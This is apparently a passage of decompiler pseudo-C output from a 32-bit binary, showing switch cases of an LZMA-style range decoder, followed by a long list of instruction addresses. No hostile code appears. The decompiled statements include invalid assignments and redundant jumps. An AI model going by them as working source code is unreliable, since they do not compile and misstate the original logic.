												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												L68:
												_t614 =  *(_t621 - 0x58);
												 *(_t621 - 0x84) = 0x12;
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t621 - 0x88) = _t542;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t621 - 0x88) = _t542;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L79;
											case 0x1b:
												L75:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t274 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t274;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t283 = __ebp - 0x64;
												 *_t283 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t283;
												 *( *(__ebp - 0x68)) = __cl;
												L79:
												 *(__ebp - 0x14) = __edx;
												goto L80;
											case 0x1c:
												while(1) {
													L123:
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__edx =  *(__ebp - 8);
													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
													 *(__ebp - 0x5c) = __cl;
													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L80:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t544 = _t543 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}














                            0x00000000
                            0x00406ffe
                            0x00406ffe
                            0x00407002
                            0x00407023
                            0x0040702a
                            0x00407030
                            0x00407036
                            0x00407048
                            0x0040704e
                            0x00407053
                            0x00000000
                            0x00407004
                            0x0040700a
                            0x004073cb
                            0x004073cb
                            0x004073cb
                            0x004073ce
                            0x004073ce
                            0x004073ce
                            0x004073d4
                            0x004073da
                            0x004073e0
                            0x004073fa
                            0x004073fd
                            0x00407403
                            0x0040740e
                            0x00407410
                            0x004073e2
                            0x004073e2
                            0x004073f1
                            0x004073f5
                            0x004073f5
                            0x0040741a
                            0x00000000
                            0x00000000
                            0x0040741c
                            0x00407420
                            0x004075cf
                            0x004075e5
                            0x004075ed
                            0x004075f4
                            0x004075f6
                            0x004075fd
                            0x00407601
                            0x00407601
                            0x0040742c
                            0x00407433
                            0x0040743b
                            0x0040743e
                            0x00407441
                            0x00407441
                            0x00407447
                            0x00407447
                            0x00406be3
                            0x00406be3
                            0x00406be3
                            0x00406bec
                            0x00000000
                            0x00000000
                            0x00406bf2
                            0x00000000
                            0x00406bfd
                            0x00000000
                            0x00000000
                            0x00406c06
                            0x00406c09
                            0x00406c0c
                            0x00406c10
                            0x00000000
                            0x00000000
                            0x00406c16
                            0x00406c19
                            0x00406c1b
                            0x00406c1c
                            0x00406c1f
                            0x00406c21
                            0x00406c22
                            0x00406c24
                            0x00406c27
                            0x00406c2c
                            0x00406c31
                            0x00406c3a
                            0x00406c4d
                            0x00406c50
                            0x00406c5c
                            0x00406c84
                            0x00406c86
                            0x00406c94
                            0x00406c94
                            0x00406c98
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00406c88
                            0x00406c88
                            0x00406c8b
                            0x00406c8c
                            0x00406c8c
                            0x00000000
                            0x00406c88
                            0x00406c62
                            0x00406c67
                            0x00406c67
                            0x00406c70
                            0x00406c78
                            0x00406c7b
                            0x00000000
                            0x00406c81
                            0x00406c81
                            0x00000000
                            0x00406c81
                            0x00000000
                            0x00406c9e
                            0x00406c9e
                            0x00406ca2
                            0x0040754e
                            0x00000000
                            0x0040754e
                            0x00406cab
                            0x00406cbb
                            0x00406cbe
                            0x00406cc1
                            0x00406cc1
                            0x00406cc1
                            0x00406cc4
                            0x00406cc8
                            0x00000000
                            0x00000000
                            0x00406cca
                            0x00406cd0
                            0x00406cfa
                            0x00406d00
                            0x00406d07
                            0x00000000
                            0x00406d07
                            0x00406cd6
                            0x00406cd9
                            0x00406cde
                            0x00406cde
                            0x00406ce9
                            0x00406cf1
                            0x00406cf4
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00406d39
                            0x00406d3f
                            0x00406d42
                            0x00406d4f
                            0x00406d57
                            0x00000000
                            0x00000000
                            0x00406d0e
                            0x00406d0e
                            0x00406d12
                            0x0040755d
                            0x00000000
                            0x0040755d
                            0x00406d1e
                            0x00406d29
                            0x00406d29
                            0x00406d29
                            0x00406d2c
                            0x00406d2f
                            0x00406d32
                            0x00406d37
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x004073ce
                            0x004073ce
                            0x004073d4
                            0x004073da
                            0x004073e0
                            0x004073fa
                            0x004073fd
                            0x00407403
                            0x0040740e
                            0x00407410
                            0x004073e2
                            0x004073e2
                            0x004073f1
                            0x004073f5
                            0x004073f5
                            0x0040741a
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00406d5f
                            0x00406d61
                            0x00406d64
                            0x00406dd5
                            0x00406dd8
                            0x00406ddb
                            0x00406de2
                            0x00406dec
                            0x004073cb
                            0x004073cb
                            0x00000000
                            0x004073cb
                            0x00406d66
                            0x00406d6a
                            0x00406d6d
                            0x00406d6f
                            0x00406d72
                            0x00406d75
                            0x00406d77
                            0x00406d7a
                            0x00406d7c
                            0x00406d81
                            0x00406d84
                            0x00406d87
                            0x00406d8b
                            0x00406d92
                            0x00406d95
                            0x00406d9c
                            0x00406da0
                            0x00406da8
                            0x00406da8
                            0x00406da8
                            0x00406da2
                            0x00406da2
                            0x00406da2
                            0x00406d97
                            0x00406d97
                            0x00406d97
                            0x00406dac
                            0x00406daf
                            0x00406dcd
                            0x00406dcf
                            0x00000000
                            0x00406db1
                            0x00406db1
                            0x00406db4
                            0x00406db7
                            0x00406dba
                            0x00406dbc
                            0x00406dbc
                            0x00406dbc
                            0x00406dbf
                            0x00406dc2
                            0x00406dc4
                            0x00406dc5
                            0x00406dc8
                            0x00000000
                            0x00406dc8
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00407068
                            0x0040706c
                            0x0040708f
                            0x00407092
                            0x00407095
                            0x0040709f
                            0x0040706e
                            0x0040706e
                            0x00407071
                            0x00407074
                            0x00407077
                            0x00407084
                            0x00407087
                            0x00407087
                            0x004073cb
                            0x004073cb
                            0x004073cb
                            0x00000000
                            0x004073cb
                            0x00000000
                            0x004070ab
                            0x004070af
                            0x00000000
                            0x00000000
                            0x004070b5
                            0x004070b9
                            0x00000000
                            0x00000000
                            0x004070bf
                            0x004070c1
                            0x004070c5
                            0x004070c5
                            0x004070c8
                            0x004070cc
                            0x00000000
                            0x00000000
                            0x0040711c
                            0x00407120
                            0x00407127
                            0x0040712a
                            0x0040712d
                            0x00407137
                            0x004073cb
                            0x004073cb
                            0x004073cb
                            0x00000000
                            0x004073cb
                            0x004073cb
                            0x00407122
                            0x00000000
                            0x00000000
                            0x00407143
                            0x00407147
                            0x0040714e
                            0x00407151
                            0x00407154
                            0x00407149
                            0x00407149
                            0x00407149
                            0x00407157
                            0x0040715a
                            0x0040715d
                            0x0040715d
                            0x00407160
                            0x00407163
                            0x00407166
                            0x00407166
                            0x00407169
                            0x00407170
                            0x00407175
                            0x00000000
                            0x00000000
                            0x00407203
                            0x00407203
                            0x00407207
                            0x004075a5
                            0x00000000
                            0x004075a5
                            0x0040720d
                            0x00407210
                            0x00407213
                            0x00407217
                            0x0040721a
                            0x00407220
                            0x00407222
                            0x00407222
                            0x00407222
                            0x00407225
                            0x00407228
                            0x00000000
                            0x00000000
                            0x00406df8
                            0x00406df8
                            0x00406dfc
                            0x00407569
                            0x00000000
                            0x00407569
                            0x00406e02
                            0x00406e05
                            0x00406e08
                            0x00406e0c
                            0x00406e0f
                            0x00406e15
                            0x00406e17
                            0x00406e17
                            0x00406e17
                            0x00406e1a
                            0x00406e1d
                            0x00406e1d
                            0x00406e20
                            0x00406e23
                            0x00000000
                            0x00000000
                            0x00406e29
                            0x00406e2f
                            0x00000000
                            0x00000000
                            0x00406e35
                            0x00406e35
                            0x00406e39
                            0x00406e3c
                            0x00406e3f
                            0x00406e42
                            0x00406e45
                            0x00406e46
                            0x00406e49
                            0x00406e4b
                            0x00406e51
                            0x00406e54
                            0x00406e57
                            0x00406e5a
                            0x00406e5d
                            0x00406e60
                            0x00406e63
                            0x00406e7f
                            0x00406e82
                            0x00406e85
                            0x00406e88
                            0x00406e8f
                            0x00406e93
                            0x00406e95
                            0x00406e99
                            0x00406e65
                            0x00406e65
                            0x00406e69
                            0x00406e71
                            0x00406e76
                            0x00406e78
                            0x00406e7a
                            0x00406e7a
                            0x00406e9c
                            0x00406ea3
                            0x00406ea6
                            0x00000000
                            0x00406eac
                            0x00000000
                            0x00406eac
                            0x00000000
                            0x00406eb1
                            0x00406eb1
                            0x00406eb5
                            0x00407575
                            0x00000000
                            0x00407575
                            0x00406ebb
                            0x00406ebe
                            0x00406ec1
                            0x00406ec5
                            0x00406ec8
                            0x00406ece
                            0x00406ed0
                            0x00406ed0
                            0x00406ed0
                            0x00406ed3
                            0x00406ed6
                            0x00406ed6
                            0x00406ed6
                            0x00406edc
                            0x00000000
                            0x00000000
                            0x00406ede
                            0x00406ee1
                            0x00406ee4
                            0x00406ee7
                            0x00406eea
                            0x00406eed
                            0x00406ef0
                            0x00406ef3
                            0x00406ef6
                            0x00406ef9
                            0x00406efc
                            0x00406f14
                            0x00406f17
                            0x00406f1a
                            0x00406f1d
                            0x00406f1d
                            0x00406f20
                            0x00406f24
                            0x00406f26
                            0x00406efe
                            0x00406efe
                            0x00406f06
                            0x00406f0b
                            0x00406f0d
                            0x00406f0f
                            0x00406f0f
                            0x00406f29
                            0x00406f30
                            0x00406f33
                            0x00000000
                            0x00406f35
                            0x00000000
                            0x00406f35
                            0x00406f33
                            0x00406f3a
                            0x00406f3a
                            0x00406f3a
                            0x00406f3a
                            0x00000000
                            0x00000000
                            0x00406f75
                            0x00406f75
                            0x00406f79
                            0x00407581
                            0x00000000
                            0x00407581
                            0x00406f7f
                            0x00406f82
                            0x00406f85
                            0x00406f89
                            0x00406f8c
                            0x00406f92
                            0x00406f94
                            0x00406f94
                            0x00406f94
                            0x00406f97
                            0x00406f9a
                            0x00406f9a
                            0x00406fa0
                            0x00406f3e
                            0x00406f3e
                            0x00406f41
                            0x00000000
                            0x00406f41
                            0x00406fa2
                            0x00406fa2
                            0x00406fa5
                            0x00406fa8
                            0x00406fab
                            0x00406fae
                            0x00406fb1
                            0x00406fb4
                            0x00406fb7
                            0x00406fba
                            0x00406fbd
                            0x00406fc0
                            0x00406fd8
                            0x00406fdb
                            0x00406fde
                            0x00406fe1
                            0x00406fe1
                            0x00406fe4
                            0x00406fe8
                            0x00406fea
                            0x00406fc2
                            0x00406fc2
                            0x00406fca
                            0x00406fcf
                            0x00406fd1
                            0x00406fd3
                            0x00406fd3
                            0x00406fed
                            0x00406ff4
                            0x00406ff7
                            0x00000000
                            0x00406ff9
                            0x00000000
                            0x00406ff9
                            0x00000000
                            0x00407286
                            0x00407286
                            0x0040728a
                            0x004075b1
                            0x00000000
                            0x004075b1
                            0x00407290
                            0x00407293
                            0x00407296
                            0x0040729a
                            0x0040729d
                            0x004072a3
                            0x004072a5
                            0x004072a5
                            0x004072a5
                            0x004072a8
                            0x00000000
                            0x00000000
                            0x00407056
                            0x00407056
                            0x00407059
                            0x004073cb
                            0x004073cb
                            0x004073cb
                            0x00000000
                            0x004073cb
                            0x00000000
                            0x00407395
                            0x00407399
                            0x004073bb
                            0x004073be
                            0x004073c8
                            0x004073cb
                            0x004073cb
                            0x004073cb
                            0x00000000
                            0x004073cb
                            0x004073cb
                            0x0040739b
                            0x0040739e
                            0x004073a2
                            0x004073a5
                            0x004073a5
                            0x004073a8
                            0x00000000
                            0x00000000
                            0x00407452
                            0x00407456
                            0x00407474
                            0x00407474
                            0x00407474
                            0x0040747b
                            0x00407482
                            0x00407489
                            0x00407489
                            0x00000000
                            0x00407489
                            0x00407458
                            0x0040745b
                            0x0040745e
                            0x00407461
                            0x00407468
                            0x004073ac
                            0x004073ac
                            0x004073af
                            0x00000000
                            0x00000000
                            0x00407543
                            0x00407546
                            0x00407447
                            0x00000000
                            0x00000000
                            0x0040717d
                            0x0040717f
                            0x00407186
                            0x00407187
                            0x00407189
                            0x0040718c
                            0x00000000
                            0x00000000
                            0x00407194
                            0x00407197
                            0x0040719a
                            0x0040719c
                            0x0040719e
                            0x0040719e
                            0x0040719f
                            0x004071a2
                            0x004071a9
                            0x004071ac
                            0x004071ba
                            0x00000000
                            0x00000000
                            0x00407490
                            0x00407490
